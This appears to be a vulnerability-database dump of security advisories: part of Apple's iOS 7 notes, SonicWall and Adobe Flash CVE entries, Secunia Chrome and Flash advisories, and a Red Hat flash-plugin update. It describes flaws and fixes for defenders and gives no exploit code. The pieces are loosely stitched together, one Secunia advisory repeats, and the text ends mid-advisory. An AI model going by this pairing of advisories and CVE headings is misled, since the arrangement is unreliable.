iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker who has arbitrary code execution on a device may
be able to persist code execution across reboots
Description: Multiple buffer overflows existed in dyld's
openSharedCacheFile() function. These issues were addressed through
improved bounds checking.
CVE-ID
CVE-2013-3950 : Stefan Esser
File Systems
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker who can mount a non-HFS filesystem may be able
to cause an unexpected system termination or arbitrary code execution
with kernel privileges
Description: A memory corruption issue existed in the handling of
AppleDouble files. This issue was addressed by removing support for
AppleDouble files.
CVE-ID
CVE-2013-3955 : Stefan Esser
ImageIO
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of JPEG2000
encoded data in PDF files. This issue was addressed through
additional bounds checking.
CVE-ID
CVE-2013-1026 : Felix Groebert of the Google Security Team
IOKit
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Background applications could inject user interface events
into the foreground app
Description: It was possible for background applications to inject
user interface events into the foreground application using the task
completion or VoIP APIs. This issue was addressed by enforcing access
controls on foreground and background processes that handle interface
events.
CVE-ID
CVE-2013-5137 : Mackenzie Straight at Mobile Labs
IOKitUser
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious local application could cause an unexpected
system termination
Description: A null pointer dereference existed in IOCatalogue.
The issue was addressed through additional type checking.
CVE-ID
CVE-2013-5138 : Will Estes
IOSerialFamily
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Executing a malicious application may result in arbitrary
code execution within the kernel
Description: An out of bounds array access existed in the
IOSerialFamily driver. This issue was addressed through additional
bounds checking.
CVE-ID
CVE-2013-5139 : @dent1zt
IPSec
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker may intercept data protected with IPSec Hybrid
Auth
Description: The DNS name of an IPSec Hybrid Auth server was not
being matched against the certificate, allowing an attacker with a
certificate for any server to impersonate any other. This issue was
addressed by improved certificate checking.
CVE-ID
CVE-2013-1028 : Alexander Traud of www.traud.de
Kernel
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A remote attacker can cause a device to unexpectedly restart
Description: Sending an invalid packet fragment to a device can
cause a kernel assert to trigger, leading to a device restart. The
issue was addressed through additional validation of packet
fragments.
CVE-ID
CVE-2013-5140 : Joonas Kuorilehto of Codenomicon, an anonymous
researcher working with CERT-FI, Antti LevomAki and Lauri Virtanen
of Vulnerability Analysis Group, Stonesoft
Kernel
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious local application could cause device hang
Description: An integer truncation vulnerability in the kernel
socket interface could be leveraged to force the CPU into an infinite
loop. The issue was addressed by using a larger sized variable.
CVE-ID
CVE-2013-5141 : CESG
Kernel
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker on a local network can cause a denial of service
Description: An attacker on a local network can send specially
crafted IPv6 ICMP packets and cause high CPU load. The issue was
addressed by rate limiting ICMP packets before verifying their
checksum.
CVE-ID
CVE-2011-2391 : Marc Heuse
Kernel
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Kernel stack memory may be disclosed to local users
Description: An information disclosure issue existed in the msgctl
and segctl APIs. This issue was addressed by initializing data
structures returned from the kernel.
CVE-ID
CVE-2013-5142 : Kenzley Alphonse of Kenx Technology, Inc
Kernel
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Unprivileged processes could get access to the contents of
kernel memory which could lead to privilege escalation
Description: An information disclosure issue existed in the
mach_port_space_info API. This issue was addressed by initializing
the iin_collision field in structures returned from the kernel.
CVE-ID
CVE-2013-3953 : Stefan Esser
Kernel
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Unprivileged processes may be able to cause an unexpected
system termination or arbitrary code execution in the kernel
Description: A memory corruption issue existed in the handling of
arguments to the posix_spawn API. This issue was addressed through
additional bounds checking.
CVE-ID
CVE-2013-3954 : Stefan Esser
Kext Management
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An unauthorized process may modify the set of loaded kernel
extensions
Description: An issue existed in kextd's handling of IPC messages
from unauthenticated senders. This issue was addressed by adding
additional authorization checks.
CVE-ID
CVE-2013-5145 : "Rainbow PRISM"
libxml
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted web page may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in libxml.
These issues were addressed by updating libxml to version 2.9.0.
CVE-ID
CVE-2011-3102 : Juri Aedla
CVE-2012-0841
CVE-2012-2807 : Juri Aedla
CVE-2012-5134 : Google Chrome Security Team (Juri Aedla)
libxslt
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted web page may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in libxslt.
These issues were addressed by updating libxslt to version 1.1.28.
CVE-ID
CVE-2012-2825 : Nicolas Gregoire
CVE-2012-2870 : Nicolas Gregoire
CVE-2012-2871 : Kai Lu of Fortinet's FortiGuard Labs, Nicolas
Gregoire
Passcode Lock
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
bypass the screen lock
Description: A race condition issue existed in the handling of phone
calls and SIM card ejection at the lock screen. This issue was
addressed through improved lock state management.
CVE-ID
CVE-2013-5147 : videosdebarraquito
Personal Hotspot
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker may be able to join a Personal Hotspot network
Description: An issue existed in the generation of Personal Hotspot
passwords, resulting in passwords that could be predicted by an
attacker to join a user's Personal Hotspot. The issue was addressed
by generating passwords with higher entropy.
CVE-ID
CVE-2013-4616 : Andreas Kurtz of NESO Security Labs and Daniel Metz
of University Erlangen-Nuremberg
Push Notifications
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: The push notification token may be disclosed to an app
contrary to the user's decision
Description: An information disclosure issue existed in push
notification registration. Apps requesting access to the push
notification access received the token before the user approved the
app's use of push notifications. This issue was addressed by
withholding access to the token until the user has approved access.
CVE-ID
CVE-2013-5149 : Jack Flintermann of Grouper, Inc.
Safari
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the handling of
XML files. This issue was addressed through additional bounds
checking.
CVE-ID
CVE-2013-1036 : Kai Lu of Fortinet's FortiGuard Labs
Safari
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: History of pages recently visited in an open tab may remain
after clearing of history
Description: Clearing Safari's history did not clear the
back/forward history for open tabs. This issue was addressed by
clearing the back/forward history.
CVE-ID
CVE-2013-5150
Safari
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing files on a website may lead to script execution even
when the server sends a 'Content-Type: text/plain' header
Description: Mobile Safari sometimes treated files as HTML files
even when the server sent a 'Content-Type: text/plain' header. This
may lead to cross-site scripting on sites that allow users to upload
files. This issue was addressed through improved handling of files
when 'Content-Type: text/plain' is set.
CVE-ID
CVE-2013-5151 : Ben Toews of Github
Safari
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a malicious website may allow an arbitrary URL to
be displayed
Description: A URL bar spoofing issue existed in Mobile Safari. This
issue was addressed through improved URL tracking.
CVE-ID
CVE-2013-5152 : Keita Haga of keitahaga.com, Lukasz Pilorz of RBS
Sandbox
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Applications that are scripts were not sandboxed
Description: Third-party applications which used the #! syntax to
run a script were sandboxed based on the identity of the script
interpreter, not the script. The interpreter may not have a sandbox
defined, leading to the application being run unsandboxed. This issue
was addressed by creating the sandbox based on the identity of the
script.
CVE-ID
CVE-2013-5154 : evad3rs
Sandbox
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Applications can cause a system hang
Description: Malicious third-party applications that wrote specific
values to the /dev/random device could force the CPU to enter an
infinite loop. This issue was addressed by preventing third-party
applications from writing to /dev/random.
CVE-ID
CVE-2013-5155 : CESG
Social
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Users recent Twitter activity could be disclosed on devices
with no passcode.
Description: An issue existed where it was possible to determine
what Twitter accounts a user had recently interacted with. This issue
was resolved by restricting access to the Twitter icon cache.
CVE-ID
CVE-2013-5158 : Jonathan Zdziarski
Springboard
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to a device in Lost Mode may
be able to view notifications
Description: An issue existed in the handling of notifications when
a device is in Lost Mode. This update addresses the issue with
improved lock state management.
CVE-ID
CVE-2013-5153 : Daniel Stangroom
Telephony
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Malicious apps could interfere with or control telephony
functionality
Description: An access control issue existed in the telephony
subsystem. Bypassing supported APIs, sandboxed apps could make
requests directly to a system daemon interfering with or controlling
telephony functionality. This issue was addressed by enforcing access
controls on interfaces exposed by the telephony daemon.
CVE-ID
CVE-2013-5156 : Jin Han of the Institute for Infocomm Research
working with Qiang Yan and Su Mon Kywe of Singapore Management
University; Tielei Wang, Kangjie Lu, Long Lu, Simon Chung, and Wenke
Lee from the Georgia Institute of Technology
Twitter
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Sandboxed apps could send tweets without user interaction or
permission
Description: An access control issue existed in the Twitter
subsystem. Bypassing supported APIs, sandboxed apps could make
requests directly to a system daemon interfering with or controlling
Twitter functionality. This issue was addressed by enforcing access
controls on interfaces exposed by the Twitter daemon.
CVE-ID
CVE-2013-5157 : Jin Han of the Institute for Infocomm Research
working with Qiang Yan and Su Mon Kywe of Singapore Management
University; Tielei Wang, Kangjie Lu, Long Lu, Simon Chung, and Wenke
Lee from the Georgia Institute of Technology
WebKit
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-0879 : Atte Kettunen of OUSPG
CVE-2013-0991 : Jay Civelli of the Chromium development community
CVE-2013-0992 : Google Chrome Security Team (Martin Barbella)
CVE-2013-0993 : Google Chrome Security Team (Inferno)
CVE-2013-0994 : David German of Google
CVE-2013-0995 : Google Chrome Security Team (Inferno)
CVE-2013-0996 : Google Chrome Security Team (Inferno)
CVE-2013-0997 : Vitaliy Toropov working with HP's Zero Day Initiative
CVE-2013-0998 : pa_kt working with HP's Zero Day Initiative
CVE-2013-0999 : pa_kt working with HP's Zero Day Initiative
CVE-2013-1000 : Fermin J. Serna of the Google Security Team
CVE-2013-1001 : Ryan Humenick
CVE-2013-1002 : Sergey Glazunov
CVE-2013-1003 : Google Chrome Security Team (Inferno)
CVE-2013-1004 : Google Chrome Security Team (Martin Barbella)
CVE-2013-1005 : Google Chrome Security Team (Martin Barbella)
CVE-2013-1006 : Google Chrome Security Team (Martin Barbella)
CVE-2013-1007 : Google Chrome Security Team (Inferno)
CVE-2013-1008 : Sergey Glazunov
CVE-2013-1010 : miaubiz
CVE-2013-1037 : Google Chrome Security Team
CVE-2013-1038 : Google Chrome Security Team
CVE-2013-1039 : own-hero Research working with iDefense VCP
CVE-2013-1040 : Google Chrome Security Team
CVE-2013-1041 : Google Chrome Security Team
CVE-2013-1042 : Google Chrome Security Team
CVE-2013-1043 : Google Chrome Security Team
CVE-2013-1044 : Apple
CVE-2013-1045 : Google Chrome Security Team
CVE-2013-1046 : Google Chrome Security Team
CVE-2013-1047 : miaubiz
CVE-2013-2842 : Cyril Cattiaux
CVE-2013-5125 : Google Chrome Security Team
CVE-2013-5126 : Apple
CVE-2013-5127 : Google Chrome Security Team
CVE-2013-5128 : Apple
WebKit
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a malicious website may lead to information
disclosure
Description: An information disclosure issue existed in the handling
of the window.webkitRequestAnimationFrame() API. A maliciously
crafted website could use an iframe to determine if another site used
window.webkitRequestAnimationFrame(). This issue was addressed
through improved handling of window.webkitRequestAnimationFrame().
CVE-ID
CVE-2013-5159
WebKit
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Copying and pasting a malicious HTML snippet may lead to a
cross-site scripting attack
Description: A cross-site scripting issue existed in the handling of
copied and pasted data in HTML documents. This issue was addressed
through additional validation of pasted content.
CVE-ID
CVE-2013-0926 : Aditya Gupta, Subho Halder, and Dev Kar of xys3c
(xysec.com)
WebKit
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to a cross-
site scripting attack
Description: A cross-site scripting issue existed in the handling of
iframes. This issue was addressed through improved origin tracking.
CVE-ID
CVE-2013-1012 : Subodh Iyengar and Erling Ellingsen of Facebook
WebKit
Available for: iPhone 3GS and later,
iPod touch (4th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to an
information disclosure
Description: An information disclosure issue existed in XSSAuditor.
This issue was addressed through improved handling of URLs.
CVE-ID
CVE-2013-2848 : Egor Homakov
WebKit
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Dragging or pasting a selection may lead to a cross-site
scripting attack
Description: Dragging or pasting a selection from one site to
another may allow scripts contained in the selection to be executed
in the context of the new site. This issue is addressed through
additional validation of content before a paste or a drag and drop
operation.
CVE-ID
CVE-2013-5129 : Mario Heiderich
WebKit
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to a cross-
site scripting attack
Description: A cross-site scripting issue existed in the handling of
URLs. This issue was addressed through improved origin tracking.
CVE-ID
CVE-2013-5131 : Erling A Ellingsen
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "7.0".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJSOe4/AAoJEPefwLHPlZEwToUP/jUGETRBdUjwN/gMmQAtl6zN
0VUMbnsNH51Lhsr15p9EHYJUL97pajT0N1gdd8Q2l+2NHkQzQLJziXgsO6VFOX7e
GoLNvlbyfoE0Ac9dSm9w7yi2lVf8bjGZKmEH0DAXzZD5s0ThiqPZCjTo8rCODMH2
TyQgkYtcXtrAHYaFe0dceWe3Q0ORu24cuFg0xeqX+7QvzK9mSeJWiN8OtimMzDni
5Dvgn7emHiuI6f3huQ25bEXK4gjN+CGwXg2RhQ7fwm9IeBdLnH1qKrFrrMHIhbrK
ibvud5jLS0ltUH+XnfBkoCkBntOO11vYllti8oIGCgaa5NkVkEOKbHy9uh6riGHT
KXYU/LfM8tt8Ax6iknn4mYC2QYbv7OIyzSfu/scWbeawsJb4OMx71oJrROTArgQG
QthFQvFk7NSe5kQlNz+xQHI5LP/ZSHTKdwT69zPIzjWQBOdcZ+4GQvmMsbKIeZeY
I2oIull2C7XYav8B0o+l4WlyEewNCOHQ8znapZnjCRKT/FF/ueG/WO0J4SEWUbQz
Kf24sZtFtm51QekPS3vc1XHacqJLELD8ugtgYC3hh9vUqkLV3UxpLKvI8uoOPUDt
SCV3qSpaxgBQtJWUZPq0MWVTDJKzX4MEB8e1p4jZAggEzfx9AdT0s7XyGm9H/UsR
GowSVGG+cJtvrngVhy3E
=dNVy
-----END PGP SIGNATURE-----
VAR-201209-0587 | CVE-2011-5169 | SonicWall Viewpoint 'scheduleID' Parameter SQL Injection Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
SQL injection vulnerability in sgms/reports/scheduledreports/configure/scheduleProps.jsp in SonicWall ViewPoint 6.0 SP2 allows remote attackers to execute arbitrary SQL commands via the scheduleID parameter. SonicWall Viewpoint is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Viewpoint 6.0 SP2 is vulnerable; other versions may also be affected. SonicWALL is a full-featured Internet security appliance designed specifically for large networks with ever-growing VPN needs
VAR-201202-0247 | CVE-2012-0751 | Adobe Flash Player of ActiveX Vulnerability in arbitrary code execution in control |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The ActiveX control in Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors. Adobe Flash Player is prone to an unspecified remote memory-corruption vulnerability.
An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers. ----------------------------------------------------------------------
Become a PSI 3.0 beta tester!
Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface.
Download it here!
http://secunia.com/psi_30_beta_launch
----------------------------------------------------------------------
TITLE:
Google Chrome Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA48265
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/48265/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=48265
RELEASE DATE:
2012-03-05
DISCUSS ADVISORY:
http://secunia.com/advisories/48265/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/48265/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=48265
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Google Chrome, where one
has an unknown impact and others can be exploited by malicious people
to conduct cross-site scripting attacks, bypass certain security
restrictions, and compromise a user's system.
1) A use-after-free error exists within v8 element wrapper handling.
2) A use-after-free error exists within SVG value handling.
3) A buffer overflow exists within the Skia drawing library.
4) A use-after-free error exists within SVG document handling.
5) A use-after-free error exists within SVG use handling.
6) A casting error exists within line box handling.
7) A casting error exists within anonymous block splitting.
8) A use-after-free error exists within multi-column handling.
9) A use-after-free error exists within quote handling.
10) An out-of-bounds read error exists within text handling.
11) A use-after-free error exists within class attribute handling.
12) A use-after-free error exists within table section handling.
13) A use-after-free error exists within flexbox with floats
handling.
14) A use-after-free error exists within SVG animation elements
handling.
For more information:
SA48033
SOLUTION:
Update to version 17.0.963.65.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits:
1) Chamal de Silva
2, 4, 5, 14) Arthur Gerkis
3) Aki Helin, OUSPG
6, 7, 8, 9, 10, 11, 12, 13) miaubiz
ORIGINAL ADVISORY:
http://googlechromereleases.blogspot.com/2012/03/chrome-stable-update.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. ----------------------------------------------------------------------
Secunia presentations @ RSA Conference 2012, San Francisco, USA, 27 Feb-02 March
Listen to our Chief Security Specialist, Research Analyst Director, and Director Product Management & Quality Assurance discuss the industry's key topics. Also, visit the Secunia stand #817.
1) An unspecified error in an ActiveX Control can be exploited to
corrupt memory.
2) A type confusion error can be exploited to corrupt memory.
3) An unspecified error related to MP4 parsing can be exploited to
corrupt memory.
4) An unspecified error can be exploited to corrupt memory.
5) An unspecified error can be exploited to bypass certain security
restrictions.
6) An unspecified error can be exploited to bypass certain security
restrictions.
Successful exploitation of the vulnerabilities #1 through #6 may
allow execution of arbitrary code.
7) Certain unspecified input is not properly sanitised before being
returned to the user.
NOTE: This vulnerability is reportedly being actively exploited in
targeted attacks
VAR-201202-0249 | CVE-2012-0753 | Adobe Flash Player Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris; before 11.1.111.6 on Android 2.x and 3.x; and before 11.1.115.6 on Android 4.x allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted MP4 data. Adobe Flash Player is prone to an unspecified remote memory-corruption vulnerability.
An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2012:0144-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0144.html
Issue date: 2012-02-17
CVE Names: CVE-2012-0752 CVE-2012-0753 CVE-2012-0754
CVE-2012-0755 CVE-2012-0756 CVE-2012-0767
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes multiple security issues
is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in. These
vulnerabilities are detailed on the Adobe security page APSB12-03, listed
in the References section.
Multiple security flaws were found in the way flash-plugin displayed
certain SWF content. An attacker could use these flaws to create a
specially-crafted SWF file that would cause flash-plugin to crash or,
potentially, execute arbitrary code when the victim loaded a page
containing the specially-crafted SWF content. (CVE-2012-0752,
CVE-2012-0753, CVE-2012-0754, CVE-2012-0755, CVE-2012-0756)
A flaw in flash-plugin could allow an attacker to conduct cross-site
scripting (XSS) attacks if a victim were tricked into visiting a
specially-crafted web page.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Bugs fixed (http://bugzilla.redhat.com/):
791034 - CVE-2012-0752 CVE-2012-0753 CVE-2012-0754 CVE-2012-0755 CVE-2012-0756 flash-plugin: multiple code execution flaws (APSB12-03)
791035 - CVE-2012-0767 flash-plugin: universal cross-site scripting flaw (APSB12-03)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
flash-plugin-10.3.183.15-1.el5.i386.rpm
x86_64:
flash-plugin-10.3.183.15-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
flash-plugin-10.3.183.15-1.el5.i386.rpm
x86_64:
flash-plugin-10.3.183.15-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-10.3.183.15-1.el6.i686.rpm
x86_64:
flash-plugin-10.3.183.15-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-10.3.183.15-1.el6.i686.rpm
x86_64:
flash-plugin-10.3.183.15-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-10.3.183.15-1.el6.i686.rpm
x86_64:
flash-plugin-10.3.183.15-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2012-0752.html
https://www.redhat.com/security/data/cve/CVE-2012-0753.html
https://www.redhat.com/security/data/cve/CVE-2012-0754.html
https://www.redhat.com/security/data/cve/CVE-2012-0755.html
https://www.redhat.com/security/data/cve/CVE-2012-0756.html
https://www.redhat.com/security/data/cve/CVE-2012-0767.html
https://access.redhat.com/security/updates/classification/#critical
http://www.adobe.com/support/security/bulletins/apsb12-03.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2012 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFPPj8uXlSAg2UNWIIRApwYAJ40DTytRRob5RU/qeWrOqIfFF4TywCbBsdq
2hfvaUbJyuTg8og5n/gSdGc=
=7NQZ
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. ----------------------------------------------------------------------
Become a PSI 3.0 beta tester!
Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface.
Download it here!
http://secunia.com/psi_30_beta_launch
----------------------------------------------------------------------
TITLE:
Google Chrome Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA48265
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/48265/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=48265
RELEASE DATE:
2012-03-05
DISCUSS ADVISORY:
http://secunia.com/advisories/48265/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/48265/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=48265
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Google Chrome, where one
has an unknown impact and others can be exploited by malicious people
to conduct cross-site scripting attacks, bypass certain security
restrictions, and compromise a user's system.
1) A use-after-free error exists within v8 element wrapper handling.
2) A use-after-free error exists within SVG value handling.
3) A buffer overflow exists within the Skia drawing library.
4) A use-after-free error exists within SVG document handling.
5) A use-after-free error exists within SVG use handling.
6) A casting error exists within line box handling.
7) A casting error exists within anonymous block splitting.
8) A use-after-free error exists within multi-column handling.
9) A use-after-free error exists within quote handling.
10) An out-of-bounds read error exists within text handling.
11) A use-after-free error exists within class attribute handling.
12) A use-after-free error exists within table section handling.
13) A use-after-free error exists within flexbox with floats
handling.
14) A use-after-free error exists within SVG animation elements
handling.
For more information:
SA48033
SOLUTION:
Update to version 17.0.963.65.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits:
1) Chamal de Silva
2, 4, 5, 14) Arthur Gerkis
3) Aki Helin, OUSPG
6, 7, 8, 9, 10, 11, 12, 13) miaubiz
ORIGINAL ADVISORY:
http://googlechromereleases.blogspot.com/2012/03/chrome-stable-update.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
